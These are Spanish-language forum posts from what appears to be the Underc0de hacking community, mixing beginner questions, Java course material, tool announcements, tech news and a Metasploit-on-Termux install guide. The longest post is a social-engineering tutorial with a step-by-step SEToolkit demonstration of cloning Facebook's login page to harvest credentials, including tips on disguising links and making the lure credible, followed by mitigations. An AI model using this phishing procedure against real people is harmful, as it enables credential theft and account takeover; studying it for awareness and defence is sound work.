Buenas noches comunidad de Underc0de. Estaba averiguando para futuros trabajos, y quería saber si alguien tiene algún post o manual bien hecho (estuve buscando en internet pero la gran mayoría no daban explicaciones técnicas) que tengan por ahí a mano o sepan de su existencia.
Básicamente sería controlar un equipo de manera remota mediante VPN.

Muchas gracias!
#12
Hola gente de UC!

Tengo una duda con respecto al Self-XSS
Esta vulnerabilidad se da con la consola de los navegadores y tiene algo que ver con el phishing, cierto? Bien.

Ahora, a pesar del CSP (Content Security Privacy) de la página web, en caso de que se logre ejecutar un script de cualquier forma, de la más loca que exista, cualquiera, así sea que yo mismo me inserte un XSS (de ahí viene la palabra Self-XSS) pero con la consola del navegador, es decir, le damos a inspeccionar elementos y abrimos la consola..


Se considera una vulnerabilidad?
Ya que si por ejemplo colocamos <script>alert(1)</script>
al menos a mí, me da un error (Uncaught SyntaxError: Unexpected token <)

A todo esto, se supone que el CSP debe proteger de XSS, al menos, tiene una protección contra scripts. A lo que voy y para terminar me refiero,
la consola de un navegador, puede ser una herramienta de hacking? (al menos en este caso?).

Saludos.
#13
Hola gente linda de la comunidad. Verán, no es nada técnico, o quizá sí.

Estoy por comenzar a darle duro al bugbounty o bughunter, como le llamen con Hackerone, estoy estudiando y no tengo un horario muy flexible que digamos, por lo que hay días en los que necesito que el día dure 80 horas y otros en los que estoy totalmente disponible, quiero usar eso para esto. En fin, al grano.

Considero que no me vendría nada mal que alguien del foro con experiencia en este campo pueda darme (no solo a mí, seguro hay más personas que están en la misma situación que yo) consejos, técnicas, tips, observaciones, etc.
Como por ejemplo, por dónde creen que es viable comenzar, cómo elegir un programa o un objetivo (por ejemplo en la lista de empresas en hackerone, cuál sería la más conveniente).
A la hora de decir "bueno, voy a elegir XXXXXX empresa que tiene este lindo programa de recompensa, empezaremos por....................." o algo similar y decir "elegí XX empresa con este programa y ya sé que es inútil hacer "esto" porque....".

No sé si me explico. Mi caso es que no sé por dónde empezar, qué tipo de vulnerabilidades suelen buscar, dónde, con qué....
Como si dijera... "bueno, si, leí este programa de esta organización así que manos a la obra.......... *5 minutos después* y ahora qué? (ya sé... si... y ahora a buscar vulnerabilidades. Pero, por dónde empezar?)".


Cualquier tipo de aporte que crean oportuno por más que yo no haya mencionado  nada al respecto sirve muchísimo.


Muchas gracias!!!
#14
Maltego es una herramienta de minería de datos interactiva que presenta gráficos dirigidos para el análisis de enlaces. La herramienta se utiliza en las investigaciones en línea para encontrar relaciones entre piezas de información de varias fuentes ubicadas en Internet.

Este software permite crear entidades personalizadas, lo que le permite representar cualquier tipo de información además de los tipos de entidades básicas que forman parte del software. El enfoque básico de la aplicación es analizar las relaciones del mundo real (redes sociales y nodos de redes informáticas) entre personas, grupos, páginas web, dominios, redes, infraestructura de Internet y afiliaciones con servicios en línea como Twitter y Facebook. Entre sus fuentes de datos se encuentran los registros DNS, los registros whois, los motores de búsqueda, las redes sociales en línea, varias API y diversos metadatos.
Es utilizado por investigadores de seguridad e investigadores privados.


Instalación de Maltego en dos sencillos pasos para Debian 9, Ubuntu, MX Linux y Linux Mint:


Primero lo descargamos
Código: text
wget https://www.paterva.com/malv423/Maltego.v4.2.3.12223.deb





Y por último lo instalamos
Código: text
sudo dpkg -i Maltego.v4.2.3.12223.deb 





Por útltimo escribimos "maltego" en la consola y se abre la herramienta.




Cualquier duda me avisan.
#15
Pengodroid es un repositorio de aplicaciones y apk's para dispositivos android.


Nos ofrece nuevas tools, todo actualizado hasta noviembre del 2017, mientras que hay algunos APK que no se pueden actualizar mas, por discontinuadas o aplicaciónes abandonadas (pero son necesarias), aunque igualmente funcionan. Todas las aplicaciones fueron probadas en versiones de 4.0 para arriba de Android, tanto en celulares como en tablets.
Dentro del repositorio, hay unos listados con todas las herramientas disponibles, y con los links originales de la URL original de la herramienta, para que puedan estar al tanto de donde buscarla y actualizarla en caso de ser necesario. Se añadieron las URLs originales de los creadores de las herramientas, en caso de estar disponibles.


Abajo de todo de la web, encontrarán los 6 links para la descarga de todas las herramientas.
Más información (y links de descarga): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#16
Hola gente. Tengo pensado dejar Windows e instalar Linux de base. Estuve viendo todas las herramientas que utilizo y en el 90% de los casos hay manera de instalar lo que uso en Windows. En este caso, no encontré forma de instalar el IDE de visual Studio. Ojo, visual Studio. Porque visual Studio code si hay forma. Pero el visual studio (IDE) no pude encontrar manera.

Ustedes saben? Gracias
#17
Hola underc0ders! A principio de año les presenté mi primera herramienta, zTool: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desafortunadamente, zTool nunca llegó a ser lo que realmente quise, pero hoy les traigo partes de lo que necesitaba zTool. Se llama, zPort.
Un escaner de puertos totalmente simple (y para nada perfecto).



Bien, ahora unos consejos que les dejo para usar zPort  :-[

IMPORTANTE: Ejecutar zPort como administrador.

MODO DE USO:
En lugar de usar una IP pública de una web, se debe usar la url.
Por ejemplo, la IP de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es 185.201.11.151

En el escaner, se debe colocar la url sin www ni http:// (como se ve en el ejemplo de la imagen que coloqué en el post)
Con respecto a los puertos filtrados, estos figurarán como cerrados por defecto, o largará un código de error distinto.
Para hacer un escaneo en la red privada, zPort solo tiene permitido hacer la búsqueda en el host en
el que se está ejecutando. Puede colocar localhost o la ipv4 del host en el que esté corriendo
el programa.

ADVERTENCIA: Si manda muchas solicitudes a una página web, es probable que se bloquee tu IP pública
temporalmente para esa web. Evítelo.



Requisitos mínimo de sistema:

> 512Mb de RAM
> Intel Core i3 6ta generación (un i3 de 7ma generación trabaja a un 50%)
> .Net Framework 4.7.2 (está dentro del .rar para que puedan instalarlo si lo desean)

---------

Con respecto a virus total:

> Leeme: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
> puntoNET472: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
> zPort: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
> Archivo RAR: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
> URL de descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
---------

Y por último, la descarga directa a zPort:

> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Les agradecería si me dijesen qué tal les parece la herramienta y cómo funciona.
#18
Hola, buenas noches.
Estoy desarrollando una herramienta para hacer un escaneo de puertos y a la hora de ejecutar el escaneo en el localhost no hay ningún problema, pero cuando
quiero analizar una IP pública, por ejemplo, me larga el error de que hay poco espacio de almacenamiento en el buffer y automáticamente se cierra
el programa que está en ejecución.

¿Hay alguna forma de agrandar la capacidad al buffer, o evitar que ocurra este error?

Adjunto imágenes del error:



------------------------------------------




La versión en la que estoy desarrollando el programa es .NET 4 y uso el Visual Studio 2019.

Gracias.

#19
Hola gente qué tal, cómo andan.
Como verán (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) hice una herramienta. La cual ya está terminada.
Mi idea es comenzar a redistribuirla en foros y demás. De momento se encuentra en Underc0de, elhacker y en uptodown se encuentra en proceso de revisión.

Me gustaría que me nombren sitios donde pueda dejar mi herramienta y así se distribuye más y llega a más gente.

Saludos
#20
Hacking / Les presento a mi hija, zTool.
Enero 08, 2019, 03:21:51 AM
Hola Underc0ders!!!! qué tal. Les presento mi primer Software, zTool. Es un proyecto estudiantil de mi universidad que llevé a cabo todo el año pasado hasta el día de hoy y que a mediados de febrero será la presentación.

Espero que les guste, si encuentran algún error, por favor díganmelo (hay operaciones en la que tarda hasta dos minutos, no es que la herramienta se cuelga, sino que está trabajando y no logré colocar un progress bar por falta de tiempo).
Para quien les interese, está hecho totalmente en Java.
Será una herramienta simple para auditar redes y tener una administración más amplia de la red privada en la que estemos conectados. Se enfoca a un kit de herramientas de trabajo con IP (Calculadora IP, hosts en la red, conversión de URL a IP, etc). Este software es de uso libre y gratuito para el sistema operativo Windows.

Por favor, comenten qué les pareció.
Desafortunadamente, hay mejoras que podría colocar (progress bar). Pero aún no hice la documentación y tengo un mes para hacerla, la cual ando ajustado de tiempo. Por lo que esto será la versión final.
Como futuro desarrollador profesional, esto me hace mucha ilusión, y terminar de compilarlo y configurar el setup hoy, subirlo y que sea instalado en sus ordenadores es un empujón enorme de motivación que a muchos a veces nos hace falta.

Gracias por el apoyo y nos vemos pronto con nuevos aportes!!


LINK: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


ALGUNAS IMÁGENES:



---



---



---



---



---



---




#21
Java / Eventos e Interfaz gráfica (NetBeans) - Unidad 5
Septiembre 13, 2018, 01:36:25 AM
Acá hay muchísimos. Muchísimos ejercicios para que hagan. Por lo menos unos 28
Son 4 proyectos. El proyecto "Uni5_Ejercicios_2" está vinculado con el documento de Word, por las dudas...
Bien, acá ya metemos las manos en la masa y empezamos a jugar con los formularios de NetBeans. Hay ejercicios con Combo Box, JList, Botones por doquier, y muchas cosas más con muchísimos eventos.

DOCUMENTACIÓN:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

EJERCICIOS RESUELTOS:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Recuerden que lo que hay dentro del .rar son los proyectos. Estos se abren dentro de NetBeans.
Pronto sigo subiendo más unidades. De momento tengo solo esas, saludos!
#22
Java / Todo acerca del String/cadenas - Unidad 4
Septiembre 13, 2018, 01:28:51 AM
Gente, en esta unidad veremos muchas funciones como el equals para trabajar con las cadenas de texto. Como en anteriores post mencioné, tendrán la documentación con ejercicios sin resolver y además tales ejercicios hechos por mí para que puedan compararlos.

DOCUMENTACIÓN:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

EJERCICIOS RESUELTOS:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!
#23
Java / Clases, objetos y herencias - Unidad 3
Septiembre 13, 2018, 01:23:53 AM
Continuando con la serie de unidades de mi carrera, en este post nos encontraremos con bastantes ejercicios de herencia. Un lío de proyectos y paquetes también. Así que intenté acomodarlo como pude. El .rar está con 5 proyectos donde hay ejercicios de herencia resueltos para que los compares con los que están en el .pdf sin resolver.

DOCUMENTACIÓN:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

EJERCICIOS RESUELTOS:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos! Si tienen alguna duda acerca de java, a la sección de dudas. Si es algo de lo que deba hacerme responsable, comentalo.
#24
Bien, esta sería el post que le sigue al post anterior xd Por lo que ya saben la temática..
En esta unidad se verá los tipos de datos y los arreglos. Con algunos ejercicios que pueden resolver, y, además, estará mi proyecto con los ejercicios ya resueltos (quizás alguno ande mal, pero bueno).


DOCUMENTACIÓN:
> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

EJERCICIOS RESUELTOS:
>No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos :)
#25
Java / Introducción a Java + Sentencia SWICH (Unidad 1)
Septiembre 13, 2018, 01:10:22 AM
Qué tal compañeros. Verán, estoy cursando la carrera de desarrollo de software y me gustaría compartir con ustedes esta serie de unidades que estoy dando en la materia de programación. En este caso les dejaré la documentación que me dan para aprender y, además, los ejercicios que hice.
Aclaro, que puede que funcionen como que no. Alguno de todos habrá con errores pero bueno  :P :P :P :P :P

Les dejaré los links subidos a mediafire.

DOCUMENTACIÓN:
> Introducción a java: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
> Sentencia switch: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

EJERCICIOS:
>Ejercicio de Switch: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
>Ejercicios de la unidad 1*: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

*: Es el proyecto donde dentro están los ejercicios (no recuerdo bien si separados por paquetes o cómo, pero supongo que podrán darse cuenta). Simplemente abren el proyecto con el Eclipse o NetBeans y listo.


Saludos! Habrá más unidades en esta sección del foro.
#26
Hola chicos del foro, les tengo alguna consulta un poco técnica. Aquellos que ya la tengan un poco clara la pueden resolver más fácil.

Veran, tengo un .bat que limpia todos los logs en mi Windows 10. Bien, lo que quiero es algún programa o algún software que ejecute ese programa de "limpiar" logs antes de que apague el equipo.

¿Alguna ayuditaaaaAAaAA? <3


Saludos underc0desitos
#27
Básicamente eso, alguien conoce algún software que mapea la red en la cuál se esté conectada?

El windows 7 traía por defecto un mapeo de red, pero era muy malo. Y el de cisco no me funciona demasiado bien.
Escucho nombres, ¡muchas gracias!
#28
Un activista acaba de filtrar miles de mensajes privados de una organización conocida por publicar secretos de otros.

Las conversaciones filtradas han sido mencionadas por los medios de comunicación estadounidenses a
principios de este año, pero por primera vez, los 11,000 mensajes se han publicado en línea, lo que permite a
cualquiera desplazarse y leer los mensajes.

Los DM filtrados del grupo privado de chat de Twitter, apodado "Wikileaks +10" por Best, muestran el fuerte favoritismo republicano de WikiLeak, ya que algunas partes de las charlas previamente filtradas mostraban las críticas de WikiLeaks a Hillary Clinton y el apoyo al GOP.

Es probable que los mensajes filtrados enviados por la cuenta de Twitter de WikiLeaks sean controlados por el fundador de WikiLeaks, Julian Assange, llamaron a la candidata del Partido Demócrata Hillary Clinton "sociópata sádica, bien conectada y sádica" y dijeron que "sería mucho mejor para el Partido Republicano ganar". , "en noviembre de 2015.




"Obama es solo un centralizador. Es malo porque representacionalmente no se ve ni actúa como lo que él representa. Hillary tiene una confusión de representación similar, pero conducirá activamente la máquina a un lugar oscuro", uno de los mensajes enviados por WikiLeaks en 19 de noviembre de 2015.

El fundador de WikiLeaks, Assange, permanece en la embajada ecuatoriana en Londres, pero los informes de la semana pasada indicaron los planes de Ecuador de retirar su asilo político y expulsarlo de su embajada en Londres, y finalmente entregarlo a las autoridades británicas.


FUENTE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29


Hace horas se rumoreaba que Microsoft iba a comprar GitHub, hace 1 día, la empresa de la ventana lo ha adquirido por bastantes dólares.
El mensaje que Microsoft lanzó afirmando la adquisición de la plataforma de software libre más grande del mundo fue: "Refuerza nuestro compromiso con la libertad, apertura e innovación para los desarrolladores". GitHub mantendrá su marca y operará de forma independiente (de momento).

Se hablaba de que GitHub estaba valorado en 2.000 millones de dólares, aunque terminó siendo de casi cuatro veces superior al  de aquella estimación a la que se apuntaba.

Esta fue la tercera adquisición de Microsoft, la primera fue LinkedIn (26.200 milones de dólares en 2016) y 8.500 millones de dólares por Skype en 2011.


Seguramente la gran incógnita ahora será si el servicio de GitHub cambiará tras esta compra de Microsoft, de momento, esta empresa no ha influido en la forma de operar de LinkedIn tras su adquisición, y se estima que esa será también la filosofía con esta operación sobre el gatito del software libre.



Asegurando, Microsoft confirma que GitHub seguirá operando de forma independiente "proporcionando una plataforma abierta para todo tipo de desarrolladores e industrias".
Los desarrolladores podrán seguir utilizando "los lenguajes de programación, herramientas y sistemas operativos de su elección para sus proyectos, y seguirán implementando su código en cualquier sistema operativo, cualquier plataforma en la nube y cualquier dispositivo".

Donde habrá cambios será en la plataforma directiva: el actual CEO de GitHub, Chris Wanstrath, será un consejero técnico "que trabajará en iniciativas software estratégicas", y para sustituirle en Microsoft han nombrado CEO de GitHub a Nat Friedman.


Sólo queda saber en este tiempo si realmente GitHub seguirá siendo lo que es con este gran e importante cambio, de momento, Microsoft está intentando de atraer lo máximo posible a la comunidad de desarrolladores, la cual, en el Twitter de GitHub, los comentarios no fueron mayormente positivos.

FUENTE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#30
Buenas noches compañeros, tengo una duda. Estoy interesado en estudiar ambos, pero quisiera que me den su opinión al respecto. Como mi conocimiento en ambos campos son casi nulos, ¿cuál creen que me resultará más sencillo estudiar y aprender primero?

¡Saludos!
#31
Hacking / Instalar Metasploit en Termux | Android
Mayo 14, 2018, 01:33:51 AM
Buenas noches che, les mostraré rapidito como instalar Metasploit en Termux para Android (obviamente) porque se vienen dos post en los que necesitaremos hacer estos pasos (únicamente esta vez) para llevar a cabo en un futuro algunas cosas que subiré.

Antes de comenzar, quiero decirles que NO SE NECESITA ROOT.
Bien, comenzamos instalando Termux, el cual se encotrará en la Play Store de Android.





hacemos un
Código: text
pkg upgrade
para justamente actualizar Termux (:




Luego haremos un
Código: text
pkg install curl
para instalar curl (:




Ahora, tendremos que poner
Código: text
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
para descargar Metasploit (:
Acá tienen la URL No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Le damos esos permisos muy bonitos al instalador de Metasploit con
Código: text
chmod 777 metasploit.sh






Listamos y vemos que está en un color verde bien fuertón. Bueno, ahora lo instalamos con
Código: text
./metasploit.sh





Limpiamos la consola para que se vea bonita con
Código: text
clear





Listamos con
Código: text
ls
y luego entramos a la carpeta de metasploit con
Código: text
cd metasploit-framework





Listamos y vemos lo que contiene, vemos que esta el Metasploit en verde y todo como lo necesitamos.




Iniciamos Metasploit con
Código: text
./msfconsole
y listo che.. Todos felices (:









Muchas gracias por leer Underc0ders, quiero mandarle un saludo a mi Mamá <3
#32
Hola underc0ders, hoy veremos lo más sencillo y básico acerca de la ingeniería social.


----------------------------------------------------------------


LA INGENIERÍA SOCIAL

La ingeniería social se ha empleado desde que el humano mintió por primera vez. Por lo que esta fue evolucionando hasta el día de hoy, convirtiéndose la peor vulnerabilidad de cualquier sistema: El error humano.
Aprovecharse de la persona ingenua para extraer información, es por lo general unos de los primeros pasos que utilizan los cibercriminales y pentesters de empresas a día de hoy.
La ingeniería social tiene muchas ramas, y se puede implementar de muchas manerascreativas.
Si hago un llamado de teléfono a una persona haciéndome pasar por un operario de banco, y le pido su número de tarjeta, lo más probable es que esta persona no me crea y me haga una denuncia. Pero hay formas de extraer otros datos no tan sensibles a través de un número telefónico. Como por ejemplo el número de cliente en una empresa de internet.
Se puede combinar con otra técnica conocida como phishing, en la que esta abunda en correos de spam, anuncios llamativos que al hacer 'clic' te descarga un troyano, etcétera.
Todo tiene en común, el error humano. El cuál, tiene una mitigación simple, pero una implementación complicada. Ya que entra en juego la responsabilidad no sólo del operador a atacar, sino de su empresa, su familia, etc.
El cibercriminal o el pentester, por lo general, antes de atacar a una persona, averigua acerca
de sus gustos, preferencias, lugar de trabajo, puesto, número telefónico, etc.

La gran mayoría de vulnerabilidades que salen a la luz tienen su parche, a mayor tiempo que este tenga en el mercado, más probabilidades hay de que haya sido parcheado en los sistemas más actualizados.
Pero hay una vulnerabilidad que es prácticamente imposible de parchear, siendo esta la más
antigua: EL FACTOR HUMANO.
Contando con el mejor sistema de seguridad (firewall, IDS, IPS, Honeypot) el factor humano es clave y por lo general, muy vulnerable para entrar al sistema. Es capaz de brindar todo tipo de información de la empresa sin precaución, esa información que tanto intenta mantener confidencial el jefe de seguridad de la empresa.

Con la ingeniería social también se puede llevar a cabo la recolección de información (information gathering) en el que este es sí o sí el primer paso al hacer un pentest o ataque malintencionado hacia una empresa, organización o persona particular.



Este ataque puede ser dirigido como no dirigido. Es decir, puede ser dirigido al empleado de la empresa, o si no logramos recolectar demasiada información en internet de este empleado; Podemos hacerle el ataque dirigido a la mujer para averiguar su número telefónico, o puesto de trabajo. Por ejemplo, a través de una encuesta de un servicio que ellos utilizan. Ya que, el empleado puede ser que esté informado y capacitado, pero rara vez este empleado "capacita" a su mujer/marido o hijos acerca de su trabajo y que no deben decir nada. Por lo que hay muchas variantes de cómo hacer este ataque. Es cuestión de creatividad.

Es muy efectivo por las variantes que tiene el cibercriminal para hacerse pasar por: Conocido, amigo, inspector de seguridad, prestador de servicios, entre muchas cosas.

EL PHISHING

Esta pequeña técnica, es de las más utilizadas al día de hoy. Engañar para robar dinero y obtener datos no es fácil, pero con el phishing, aprovechándose de la ignorancia de muchas personas puede ser una gran ventaja para el cibercriminal.  Anteriormente se utilizaba por lo general para robar credenciales del Homebanking, al día de hoy es altamente peligroso, ya que mediante esta técnica se puede meter virus.

El Phishing hace uso de la ingeniería social, sea para hacer spam como en el caso de clonar una página web y enviársela a la víctima para que acceda creyendo que es la original, por lo que una vez que entre a la página web falsa y coloque sus datos, estos son redirigidos al
atacante.
Esta técnica es fácil de implementar, pero no garantiza el 100% que pueda funcionar. Ya que la persona puede estar capacitada, no recibir el e-mail por algún motivo, o simplemente no le llamó la atención que debió generar en la víctima para que caiga en la trampa.

IMPORTANCIA

Tener un fallo de seguridad en el sistema es grave, por lo que la importancia está en todos lados a nivel de seguridad. Pero ser vulnerable a la ingeniería social (incluyendo al  phishing, pharming, entre otras) es ALTAMENTE CRÍTICO.

¿Por qué? Porque no existe IDS, IPS, firewall, honeypot, antivirus, parche, o cualquier método de seguridad aplicada en servidores, hosts, o red que sea capaz de mitigar la estupidez humana.

Un gran fallo del factor humano es la seguridad de las credenciales de sus cuentas, sean redes sociales, bancarias, etc.
Los tops de contraseñas cada año son prácticamente las mismas, y estas se pueden encontrar en cualquier tipo de diccionario para hacer un ataque de diccionario o fuerza bruta.

EL USUARIO ES EL ESLABÓN MÁS DÉBIL




¿QUIÉNES APLICAN ESTA TÉCNICA?

• Hackers / Pentesters
• Terroristas
• Criminales / Cibercriminales
• Empleados enojados
• Ladrones de identidad
• Gobiernos extranjeros / Agentes del gobierno extranjero
• Espías industriales / Agentes de espionaje industrial
• Recolectores de inteligencia empresarial
• Agentes de información / Investigadores privados

Como vemos son muchos los campos en los que se emplea la ingeniería social.

PASOS PARA LLEVAR A CABO UNA TÉCNICA DE INGENIERÍA SOCIAL

1_ Reconocimiento

- Virtual: Este tipo de reconocimiento está relacionado a infectar ordenadores con spyware o código malicioso. A través de un e-mail por
lo general.

- Físico: Este tipo de reconocimiento está relacionado a recolectar información a través de medios electrónicos. Analizar blogs, listas de
correos, etc.

2_ Recolección de información

Una vez que la etapa de reconocimiento finalizó, se debe transmitir toda la información disponible a través de los medios mencionados.

3_ Relación de información

Durante un período de tiempo, la información se relacionará y establecerán los canales de comunicación estableciendo las conexiones.

4_ Usando la información

Llegó el momento de realizar el ataque y este puede ocurrir de diferentes maneras. Como, por ejemplo, hacer un robo de identidad para intentar
ganar la información de una organización a través de esa ID que nos proporcionó la víctima anteriormente.

ATAQUES DE INGENIERÍA SOCIAL

Teléfono: Un atacante llama por teléfono y trata de intimidar a alguien en la posición de autoridad o relevancia, de esta forma obtiene información. Por lo general, los centros de ayuda son vulnerables a este tipo de ataque.

Dumpster Diving (trashing): Es otro método de ingeniería social. Mucha información puede ser encontrada en la basura.

Drive-by infection: Cuando uno descarga "soluciones de seguridad" desde sitios web, es posible infectarse con diferentes variedades de malware o troyanos.

e-Mail: Los emails enviados pueden contener información interesante para los usuarios y ser bastante llamativos como la "imaginación" lo permita.

Curiosidad: El atacante deja un dispositivo de almacenamiento como pendrive, CD, memoria flash en un lugar donde pueda ser encontrado, mientras espera a que la víctima introduzca el dispositivo para infectarse con el código malicioso.

Suplantación ID: Consiste en caracterizar a una persona, un rol. Generalmente los roles más empleados son soporte técnico y gerente. En las empresas muy grande, es difícil conocer a todos los empleados y falsificar las ID resulta muy simple.

Shoulder Surfing: Consiste en entablar una conversación y realizar notas mentales sobre las teclas que presiona el usuario al momento de ingresar datos de acceso a un sistema.

Office Snooping: Muchos usuarios no dejan bloqueadas sus computadoras cuando se levantan de sus escritorios, o aún peor, cuando se retiran del trabajo. Por lo que se puede acceder sin autentificarse.

Ingeniería social inversa: Es el modo avanzado de la ingeniería social, el atacante trata  de parecer alguien de autoridad, para que le pregunten a él y así obtener información. Requiere mucha preparación, investigación y saber relacionarse con las personas.

ALGUNAS PREGUNTAS INTERESANTES...



DEMOSTRACIÓN DE ATAQUE PHISHING
UTILIZANDO INGENIERÍA SOCIAL


SETOOLKIT

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Setoolkit es la herramienta de ingeniería social por excelencia dentro del pentesting, el hacking y el cibercrimen.
Ofrece una variedad de vectores de ataques que dejan al cibercriminal hacer un plan de robo con infinitas variedades y formas.
SET es multiplataforma y sólo necesitamos tener instalado el interprete de Python para ejecutarlo e iniciarlo.
SET viene instalado en muchas plataformas de seguridad informática, como Backtrack y Kali Linux.


Entramos a Setoolkit y vemos nuestra dirección IP privada (esta demostración la haré a nivel LAN)



--------


1) Social-Engineering Attacks Nos dará como resultado un segundo menú que a la línea del primero es bastante explícito a la par que conciso.



Colocamos la Opción 1 ya que haremos un ataque de ingeniería social.

1) Spear-Phishing Attack Vectors: Se utiliza para llevar a cabo ataques de correo electrónico dirigidos contra una víctima (por más que yo haga un ataque con
correo electrónico, utilizaré el punto 2 para clonar la página web).

2) Website Attack Vectors: Es una forma única de utilizar múltiples ataques basados en Web con el fin de comprometer a la posible
víctima.

3) Infectious Media Generator: Nos permite crear medios infectados por medio de los payload de metasploit que utilizan autorun.inf file.

4) Create a Payload and Listener: Simplifica enormemente la creación de ficheros .exe a partir de los payloads de Metasploit y sus clientes.

5) Mass Mailer Attack: Nos permitirá el ataque masivo mandando correos electrónicos a múltiples víctimas y personalizar los mensajes.




Utilizando la opción 2 (Website Attack Vectors) nos encontraremos con tres opciones que de por sí son fáciles de comprender qué hacen...

Marcamos la opción 3 Credential Harvester Attack Method porque queremos hacer un robo de credenciales a un login de Facebook. Subiendo un servidor en nuestra máquina, para engañar a algún incauto y conseguir su cuenta de correo y contraseña.




Acá nos encontramos con otras opciones muy intuitivas. Nosotros lo que queremos es clonar una página web, por lo que elegiremos la opción 2,
Site Cloner.




Pasamos a colocar nuestra IP privada, la cual sería la de nuestro host atacante.



Y luego, la página web que queremos que nuestra víctima entre, en este caso, el login de Facebook. NO la página principal, sino, el /login.php



Una vez que hemos hecho estos pasos, NO hay que cerrar la terminal que está ejecutando el programa, porque está en espera de que alguien caiga y así obtener
las credenciales.



Ahora viene la parte más importante, "difícil" y que debemos sacar toda nuestra creatividad (en el caso de ser un cibercriminal). Por lo que este proceso si se hace en serio puede durar desde minutos, hasta días. En mi caso, me llevó minutos. Ya que el atacante soy yo, y la víctima también soy yo. El atacante será mi cuenta de protonmail y la víctima mi cuenta de Gmail... veremos qué tan anti-phishing es Gmail según las noticias últimamente.


Obviamente quiero aclarar que, para ser más creíble, hay que crearse una cuenta de Gmail o un dominio propio (en el caso de tomarse muy en serio de robar datos). Por ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Como esto es una demostración intentaré ser lo más conciso y simple posible.

-------------EJEMPLO DE ATAQUE---------------

Entramos a la cuenta de correo electrónico atacante



Camuflamos la URL real en el texto para mostrar, para que la víctima al recibir el correo, no se percate de lo que realmente sea. Aunque, una vez que entre, ahí cabe la posibilidad de que se de cuenta que es una trampa. Pero, a día de hoy, hay gente poco capacitada al respecto y no logra darse cuenta...



Una parte fundamental del phishing a la hora de hacer un ataque de ingeniería social, es conocer mínimamente a la víctima. Es por eso (en este caso, yo ya me conozco jaja) que busqué en su perfil de Facebook su foto de perfil actual para que parezca "más creíble" (esto se puede hacer mejor, pero es una demostración y quiero que se entienda).



No está de más poner hora, ubicación con coordenadas y foto de Google maps, junto el sistema operativo y navegador que se haya intentado acceder...



Recordemos que la ingeniería social es más fácil de llevar a cabo si se es amable con la víctima.



En mi cuenta de Gmail recibí el correo electrónico tal y como yo lo diseñé. Por lo que Gmail no ofreció ningún sistema de Anti-Phishing que tanto mencionaron. Esto es lo que vería la víctima.



Como yo no he iniciado sesión, debo entrar para configurar la privacidad de mi cuenta, ¿verdad? Bueno, esto es lo que aparece cuando hacemos clic en el texto a mostrar que hemos puesto en protonmail.



No hace falta ser agente de la CIA para darse cuenta que no es el login real. Pero, como mencioné anteriormente, si la persona/victima no está capacitada, y tiene un conocimiento de informática limitado, es capaz de ni siquiera mirar la barra de navegación donde está la IP de mi host en este caso...



Colocamos nuestras credenciales en el caso de que no nos hayamos dado cuenta que estamos siendo víctima de un cibercriminal al momento de hacer clic en "iniciar sesión". Por lo que, a partir de ese clic, ya no hay marcha atrás y estaremos recibiendo las credenciales de la víctima.



Generalmente, acá las víctimas con conocimiento medio en informática se acaban de dar cuenta que se comió un phishing, o simplemente un "error" en el login de Facebook.



Mientras que el atacante, recibe esto en la terminal donde se está ejecutando setoolkit; Las credenciales.





Como nos hemos dado cuenta, la ingeniería social es una técnica no tan técnica. Donde la creatividad y en casos suerte nos dará la posibilidad de obtener lo que queremos.

MITIGACIÓN DEL ATAQUE

• La mejor manera de aumentar nuestras defensas, es disminuir la posibilidad de evadirlas. Utilizar seguridad física, biometría y restringir el acceso físico.

• Utilizar contraseñas seguras, evitando fechas de nacimiento, nombres propios, nombres de los hijos(as), de las mascotas o cónyuges.

• Evitar en lo posible el uso de redes peer-to-peer o P2P (redes para compartir archivos) como eMule, Kazaa, Limewire, Ares, Imesh o Gnutella porque generalmente están desprotegidos de troyanos y virus en general. Estos se expanden utilizándolas para alcanzar a nuevos usuarios a los que quiere infectar de forma especialmente sencilla.

• Establecer políticas de seguridad a nivel de Sistema Operativo.

• Los usuarios no necesitan tener acceso a todo tipo de archivos o ficheros ya que no todos son necesarios para su trabajo habitual, por ello puede ser conveniente por parte del administrador bloquear la entrada de archivos o ficheros con extensiones ".exe", ".vbs", etc.

• Nunca tirar documentación técnica ni sensible a la basura, sino destruirla.

• No revelar información personal por correo electrónico ni en línea a menos que sepa por qué motivo debe hacerlo y conozca a su interlocutor. Asegúrese además de que se encuentra en un entorno seguro: Es esencial para ayudarle a evitar cualquier tipo de ataque.

